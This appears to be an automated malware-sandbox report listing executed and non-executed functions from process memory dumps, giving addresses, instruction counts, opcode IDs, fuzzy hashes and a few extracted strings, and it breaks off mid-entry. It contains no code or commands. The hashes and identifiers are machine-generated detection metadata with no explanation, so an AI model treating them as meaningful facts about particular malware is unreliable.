                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 24a029d15958f6a8dfcd8a89811fc6da071459af3f42a4840194381f7ff82aa6
                                                                                                                                                                  • Instruction ID: d95777ff94347b4deab743903efffeeba412eef2fe53de0c376157acf92fa491
                                                                                                                                                                  • Opcode Fuzzy Hash: 24a029d15958f6a8dfcd8a89811fc6da071459af3f42a4840194381f7ff82aa6
                                                                                                                                                                  • Instruction Fuzzy Hash: F6D14B62B0E9490FE7A4FB6C88656B977D2EFA4310F0501BAE45DC72E7CD68ED458380
                                                                                                                                                                  Function 00007FFD9BAC1065 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 803dc4c373674a967346147a4f79a6fa8aa825e09d3f91daa14c616c31b99e49
                                                                                                                                                                  • Instruction ID: 388f124f7925c008f669f362b6cf7494456ab7e2dc8c3f2c80e0cf7a2d337e29
                                                                                                                                                                  • Opcode Fuzzy Hash: 803dc4c373674a967346147a4f79a6fa8aa825e09d3f91daa14c616c31b99e49
                                                                                                                                                                  • Instruction Fuzzy Hash: 31A11731B0990D4FEBA4FB2888697B977E2EFA8314F5541B9D41DC72E6CE38AC418740
                                                                                                                                                                  Function 00007FFD9BAC22BC Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 14a5823aa385d405b0caf6e54c6a1e75adae5ef89132da75096342c24ee6676b
                                                                                                                                                                  • Instruction ID: 36025c7997e3e3844eec02be5341597de79b56503cbec9b59472ec06b52373fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 14a5823aa385d405b0caf6e54c6a1e75adae5ef89132da75096342c24ee6676b
                                                                                                                                                                  • Instruction Fuzzy Hash: 91517231D08A1C8FDB68EF58D855BE9BBB1FB59310F1082AAD00DD3256DE34A9858F81
                                                                                                                                                                  Function 00007FFD9BAC09B0 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9bbe7d9cfe6c1241a9a25fb33d8d5f1315c5858ee7f68bde46ff9157279ae462
                                                                                                                                                                  • Instruction ID: bd301bb3671335a026e2a68ad59038454f39c4d7f0b54cbec4f57178c223157e
                                                                                                                                                                  • Opcode Fuzzy Hash: 9bbe7d9cfe6c1241a9a25fb33d8d5f1315c5858ee7f68bde46ff9157279ae462
                                                                                                                                                                  • Instruction Fuzzy Hash: FA51B330B2CA494FEB58BF2C88696B977D6EF98704F040279F44EC32D6DE64A8428745
                                                                                                                                                                  Function 00007FFD9BAC0991 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1bdf7c17a93fa6d2cd75cead0423063f528777cdec114925976076bd89d86584
                                                                                                                                                                  • Instruction ID: eb3ef539e6c7e50b2f525b4acefafaba9ec4bf7f091884fe20addf414aa0a6b0
                                                                                                                                                                  • Opcode Fuzzy Hash: 1bdf7c17a93fa6d2cd75cead0423063f528777cdec114925976076bd89d86584
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41E630B1DA494FEB68FB2C88696B877D1EF99704F050279F44DC32D6CE68A8428745
                                                                                                                                                                  Function 00007FFD9BAC0848 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f019e244345453351c9c40c5cdf0ca905a438456e7a2b6f2a2666675d05ccdb1
                                                                                                                                                                  • Instruction ID: 1aada86c3b4b3f7b4d4078233b81a23409f3cb414ffc1a28980c13ec783af009
                                                                                                                                                                  • Opcode Fuzzy Hash: f019e244345453351c9c40c5cdf0ca905a438456e7a2b6f2a2666675d05ccdb1
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B318230E18A4D8FDF94EFA8C8A5AADB7F1FF58310F4005B5E009D7296DE78A8418B40
                                                                                                                                                                  Function 00007FFD9BAC0C72 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 156a436dbf190fe477bbc2ba574a1f0993bf26ce4105c6f8cb5dd1d0f67b620a
                                                                                                                                                                  • Instruction ID: 6ceeea1cca81ffdc3bd09a147a8e1faa9b3d7bed71732a2b6be1270a318ee6dd
                                                                                                                                                                  • Opcode Fuzzy Hash: 156a436dbf190fe477bbc2ba574a1f0993bf26ce4105c6f8cb5dd1d0f67b620a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F11293190E6C64FE327A7B048626A57FA0AF03254F1A02EAD0D8C71E3DD9C6446C362
                                                                                                                                                                  Function 00007FFD9BAC0BDB Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000090.00000002.2786443642.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d51e2c7b1bf6701251d3c5ef898d364bfca3c51d12d0af863dc004b570d29954
                                                                                                                                                                  • Instruction ID: 5d723e23ae21448bababbb47e10ab4d81c045fc318c4b33da3ec3605969a9858
                                                                                                                                                                  • Opcode Fuzzy Hash: d51e2c7b1bf6701251d3c5ef898d364bfca3c51d12d0af863dc004b570d29954
                                                                                                                                                                  • Instruction Fuzzy Hash: DBF0E5B254D64C2FEB58E959AC179F63B98EB83234F00101FF58E82063F1527913C255

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BA9108D Relevance: 1.3, Instructions: 1336COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 86633098604934e93a9d7e14ad7c38a0980db6452430dc1af3ebb14ee40820de
                                                                                                                                                                  • Instruction ID: c1d66113704df2409fe3417cac16c332774b695bec1a64b2cdc8cd443943ef50
                                                                                                                                                                  • Opcode Fuzzy Hash: 86633098604934e93a9d7e14ad7c38a0980db6452430dc1af3ebb14ee40820de
                                                                                                                                                                  • Instruction Fuzzy Hash: 8792F431B1991D4FEBA4FB6888A5BB973E2FF98314F4501B9D00DC32E6DE28AD418745
                                                                                                                                                                  Function 00007FFD9BA96896 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 99a484c2fba703a9bfa0b2d8f352c0e36bf428f5053bd6a8fb1965bc5e9ab082
                                                                                                                                                                  • Instruction ID: 473d8c67577801d33af9567549ef52eb935e934b953c07541c309798d9a7de7d
                                                                                                                                                                  • Opcode Fuzzy Hash: 99a484c2fba703a9bfa0b2d8f352c0e36bf428f5053bd6a8fb1965bc5e9ab082
                                                                                                                                                                  • Instruction Fuzzy Hash: 90F1C530A09A4D8FEBA8DF28C8557E937E1FF54350F04826EE85DC7295DF74A9418B82
                                                                                                                                                                  Function 00007FFD9BA97642 Relevance: .5, Instructions: 461COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 89dd308b7d32489a4e33bb09829623c757d0e2f8d9de167cf64e8521681029ad
                                                                                                                                                                  • Instruction ID: 514e74b820a52214dcd1ae4ec8ab7185340bbc503f7b28d0a6e469a1d190107e
                                                                                                                                                                  • Opcode Fuzzy Hash: 89dd308b7d32489a4e33bb09829623c757d0e2f8d9de167cf64e8521681029ad
                                                                                                                                                                  • Instruction Fuzzy Hash: EAE1B230A09A4E8FEBA9DF28C8557E977D1FF54310F04826AD84DC72A5DF74A981CB81
                                                                                                                                                                  Function 00007FFD9BA92B2D Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 7T^I
                                                                                                                                                                  • API String ID: 0-204804230
                                                                                                                                                                  • Opcode ID: bdd9e1bc50cecc2c8fcb0182cc8b2b8cb7b035969126b98caa1d2d1322c144f3
                                                                                                                                                                  • Instruction ID: df92ec248c668958e9ae9cf49bdccaa31949a70a1d874acdc8dfff61a51e1b65
                                                                                                                                                                  • Opcode Fuzzy Hash: bdd9e1bc50cecc2c8fcb0182cc8b2b8cb7b035969126b98caa1d2d1322c144f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 84415943F0F6C61FE3699BB81C261A03BD1EF6265571900BBD0A8C70ABD9456D0693D2
                                                                                                                                                                  Function 00007FFD9BA915DC Relevance: .8, Instructions: 792COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 32d27c95fad13d7398ab270a3f07ef1d22e99407857de84dc642fe5ae49c212a
                                                                                                                                                                  • Instruction ID: f6b18c639a5a6fab1b000e741c8b59d45aeea7c4b6d7c6230e6ddabdc7db70a9
                                                                                                                                                                  • Opcode Fuzzy Hash: 32d27c95fad13d7398ab270a3f07ef1d22e99407857de84dc642fe5ae49c212a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B42C431B1991D8FEBA8EB6884A577873E2FF98304F5141B9D00DC32E6DE38AD419B45
                                                                                                                                                                  Function 00007FFD9BA9897D Relevance: .5, Instructions: 477COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e3789a0edf71228169de7911a9798e6e313657a495492ccd4d92b2f8c9cc2de1
                                                                                                                                                                  • Instruction ID: 8ce6001c3d9566f496fa521e04cc2b6c6140f0571c552455b835dd497fec7c17
                                                                                                                                                                  • Opcode Fuzzy Hash: e3789a0edf71228169de7911a9798e6e313657a495492ccd4d92b2f8c9cc2de1
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F512652B0EACA4FEB71976C48392697BD0EF15374B0901BAC49D870E3EE5D79059342
                                                                                                                                                                  Function 00007FFD9BA97256 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ae51b155f1b7e2347a235efd3a1386e1ae35910cc88e351054c13d78d504ff6f
                                                                                                                                                                  • Instruction ID: 696afd5e87fffe5624b0ffaec2e3f76b6ad221fc215fd5f9fcafcd3fb4c89efd
                                                                                                                                                                  • Opcode Fuzzy Hash: ae51b155f1b7e2347a235efd3a1386e1ae35910cc88e351054c13d78d504ff6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 44B1C53060DA4D4FEBA8DF28C8557E93BD1EF59310F14426EE85DC72A2CB74A945CB82
                                                                                                                                                                  Function 00007FFD9BA90830 Relevance: .2, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 5446faa6e8b67908c139710def0571f908a1fe79944ef10e051fc5ef21c18935
                                                                                                                                                                  • Instruction ID: dec9ba0605fd1a6372440874786d8a5037edcced5ee7b8ab0a47e4fefd239140
                                                                                                                                                                  • Opcode Fuzzy Hash: 5446faa6e8b67908c139710def0571f908a1fe79944ef10e051fc5ef21c18935
                                                                                                                                                                  • Instruction Fuzzy Hash: 51818230F19A4D8FEB94EBA8C8A4AAC7BF1FF59310F4541B6D00DD71A6DE28A841C751
                                                                                                                                                                  Function 00007FFD9BA97DD1 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 68d591005ed015dafae46b9ae40f3474ae73f42e77790db0ee6f35eef7997f46
                                                                                                                                                                  • Instruction ID: 84fe7d25b6bfac1c3e686d10eb139c9a4b01ebe790231faa991ceccc3e8edd8a
                                                                                                                                                                  • Opcode Fuzzy Hash: 68d591005ed015dafae46b9ae40f3474ae73f42e77790db0ee6f35eef7997f46
                                                                                                                                                                  • Instruction Fuzzy Hash: 8351D821B19C0D4FEBA8E76C44667B873D2EF9C325F5502B9E01DC32E6DE28AC458751
                                                                                                                                                                  Function 00007FFD9BA93D7C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 134afe4e51e0e300187ece73963016caf2adc7788475051e11ef616837855eaa
                                                                                                                                                                  • Instruction ID: 00af50515b093f375e325e35bb2242bdf6d98de8402e229f7de736223cfbb56f
                                                                                                                                                                  • Opcode Fuzzy Hash: 134afe4e51e0e300187ece73963016caf2adc7788475051e11ef616837855eaa
                                                                                                                                                                  • Instruction Fuzzy Hash: 20516031D08A1C8FDB68DF58D855BE9BBF1FB59310F1082AAD04DD3292DE74A9858F81
                                                                                                                                                                  Function 00007FFD9BA90AB0 Relevance: .2, Instructions: 185COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9a3c3c514e15653e09090b4a2015cab2e89c99b9ca39b66b3056c3cd6f36c707
                                                                                                                                                                  • Instruction ID: 5ee8b73cfaa3a1f18de25416225595fc9af84ed9a325841b06dd436a0ad0ee61
                                                                                                                                                                  • Opcode Fuzzy Hash: 9a3c3c514e15653e09090b4a2015cab2e89c99b9ca39b66b3056c3cd6f36c707
                                                                                                                                                                  • Instruction Fuzzy Hash: A151D430B18A494FDB98EB2C8469A7977D1FF9C718F000579E08EC3396DD68AC428745
                                                                                                                                                                  Function 00007FFD9BA97E1F Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: c882da8b97aafd2bcf466c9056900c801168be22f7e1035c09117618545a3bc2
                                                                                                                                                                  • Instruction ID: 9d56d2237529fb9aba1d4d9c2447bec2f6f973304b1b351c53d6a5a76876dadf
                                                                                                                                                                  • Opcode Fuzzy Hash: c882da8b97aafd2bcf466c9056900c801168be22f7e1035c09117618545a3bc2
                                                                                                                                                                  • Instruction Fuzzy Hash: 7851F821B19C0D4BEBA4E76C44657B873C2EFDC325F5502B9E01CC32EACE28AC458781
                                                                                                                                                                  Function 00007FFD9BA90A91 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 826105562bfc41837c3baf719fbd617a0070c4eaac86cf44a967e7bc22ac2060
                                                                                                                                                                  • Instruction ID: aea0fca23a04e607db084cecc05b8d377ff519eb019714e98ad97328e94176a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 826105562bfc41837c3baf719fbd617a0070c4eaac86cf44a967e7bc22ac2060
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41F530B1CA494FEB68EB2C8469BB977D1EF98754F040179F08EC32D6DD68AC418386
                                                                                                                                                                  Function 00007FFD9BA91F6D Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 60c77e9d0b3b93882ff6818ffe2826990fbee6d1d3690b15c23f11c643dedc0f
                                                                                                                                                                  • Instruction ID: 2ff7c61004f5e3737ace4000ac88983a886149c039d6394524a95497cf836102
                                                                                                                                                                  • Opcode Fuzzy Hash: 60c77e9d0b3b93882ff6818ffe2826990fbee6d1d3690b15c23f11c643dedc0f
                                                                                                                                                                  • Instruction Fuzzy Hash: DE41D231B1EA0D4FEBB8EB6888717B873D2EF89740F0140BAD04DC32A2CE656D428741
                                                                                                                                                                  Function 00007FFD9BA90875 Relevance: .2, Instructions: 164COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9494a1ab16768ebafd105d36b7d7b72487e41cf3153659ac9b9c89618f62acc1
                                                                                                                                                                  • Instruction ID: f67626b793b5b6db9c33a8c8e9fab762989ddc43982e4ab294f2e1cc2f2e70c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 9494a1ab16768ebafd105d36b7d7b72487e41cf3153659ac9b9c89618f62acc1
                                                                                                                                                                  • Instruction Fuzzy Hash: 64512034E1995D8FEB94EBA8C8A4AAD77F1FF58304F4101B5E00DD729ADE38A841CB41
                                                                                                                                                                  Function 00007FFD9BA90C83 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8cc1f73d62b4f21eb6a6f478010b0b10b18194ebd6bcad59b29edaee3b6085c6
                                                                                                                                                                  • Instruction ID: b9e31c0d6de1aadcea5ac69b1386cd5babe6b395b60e32f2a57645651a63f3c6
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc1f73d62b4f21eb6a6f478010b0b10b18194ebd6bcad59b29edaee3b6085c6
                                                                                                                                                                  • Instruction Fuzzy Hash: E9010031B5D90C8FDF94FB9CE492AFCB3E1EF59310F010129E10ED3252CA65A8428B41
                                                                                                                                                                  Function 00007FFD9BA90508 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: adb4289cf2ad86c7d6a01a7c742cb8e9a49b341f9086276de070d94a5c1309c2
                                                                                                                                                                  • Instruction ID: d100e887caf847198252e8eca3c93df4d7a8431f882414535a8f9a616ceafd2d
                                                                                                                                                                  • Opcode Fuzzy Hash: adb4289cf2ad86c7d6a01a7c742cb8e9a49b341f9086276de070d94a5c1309c2
                                                                                                                                                                  • Instruction Fuzzy Hash: E3012653F0ED090BE3B8AA6C58696B122C2DFDC765B120176E01DC32EAEC552C464290
                                                                                                                                                                  Function 00007FFD9BA90CF9 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7598a169349f9c5ca9e83fedbdfd78a313fcef022f5eeda58c264283e67bfc0f
                                                                                                                                                                  • Instruction ID: abb815f223b6d5edbb716ef5d2295fa47417ae590fc8dde5da6635a1e1cda69f
                                                                                                                                                                  • Opcode Fuzzy Hash: 7598a169349f9c5ca9e83fedbdfd78a313fcef022f5eeda58c264283e67bfc0f
                                                                                                                                                                  • Instruction Fuzzy Hash: CAF0557260D70C1EF758960DAC079F63798EB83270F00100EE19EC2142E01228238292
                                                                                                                                                                  Function 00007FFD9BA90A50 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: d99790c6ff4772cf3b6b8f68b84efe0769fa781bc631133b54400537a34f1ac8
                                                                                                                                                                  • Instruction ID: 87754794021ed9d5632ff168c101c914c3ed8626ccd610aa80458e164c9606e4
                                                                                                                                                                  • Opcode Fuzzy Hash: d99790c6ff4772cf3b6b8f68b84efe0769fa781bc631133b54400537a34f1ac8
                                                                                                                                                                  • Instruction Fuzzy Hash: 39E08021F18C1D4F9AA4FB3D5865E6963D2EFDC32074546F6E40CC329ADD28DC414381

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00007FFD9BA90708 Relevance: 8.8, Strings: 7, Instructions: 94COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000095.00000002.2863733248.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: P_^#$P_^%$P_^3$P_^5$P_^7$P_^9$P_^=
                                                                                                                                                                  • API String ID: 0-3407535953
                                                                                                                                                                  • Opcode ID: f0fe5a9d4630714a4407d2e8f68f2f8d7ce558d689f27a5aa0db49c5492855d8
                                                                                                                                                                  • Instruction ID: 2e1d31ffafaddc2a89b520910648c7364c359632f6299cc70aebf1976731f8e5
                                                                                                                                                                  • Opcode Fuzzy Hash: f0fe5a9d4630714a4407d2e8f68f2f8d7ce558d689f27a5aa0db49c5492855d8
                                                                                                                                                                  • Instruction Fuzzy Hash: D021067B7041281AD314BA6CBCE2ADD375CEE8037A7450773E4ECCE05BD925688BC590

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00007FFD9BAD49C6 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000009F.00000002.2839369327.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 73e777ba12b5a4fec00d283b1c5388d793aa4ee7adccb40016bbaa6ba039b31b
                                                                                                                                                                  • Instruction ID: 26e74e74c072b5d52adde2484e6481642d4f8b2b698ba2247951dda6a10bc463
                                                                                                                                                                  • Opcode Fuzzy Hash: 73e777ba12b5a4fec00d283b1c5388d793aa4ee7adccb40016bbaa6ba039b31b
                                                                                                                                                                  • Instruction Fuzzy Hash: EFF18230A09A8D8FEBA8DF28C8557E937D1FF94310F04426EE85DC72A5DF74A9458B81
                                                                                                                                                                  Function 00007FFD9BAD5772 Relevance: .5, Instructions: 454COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
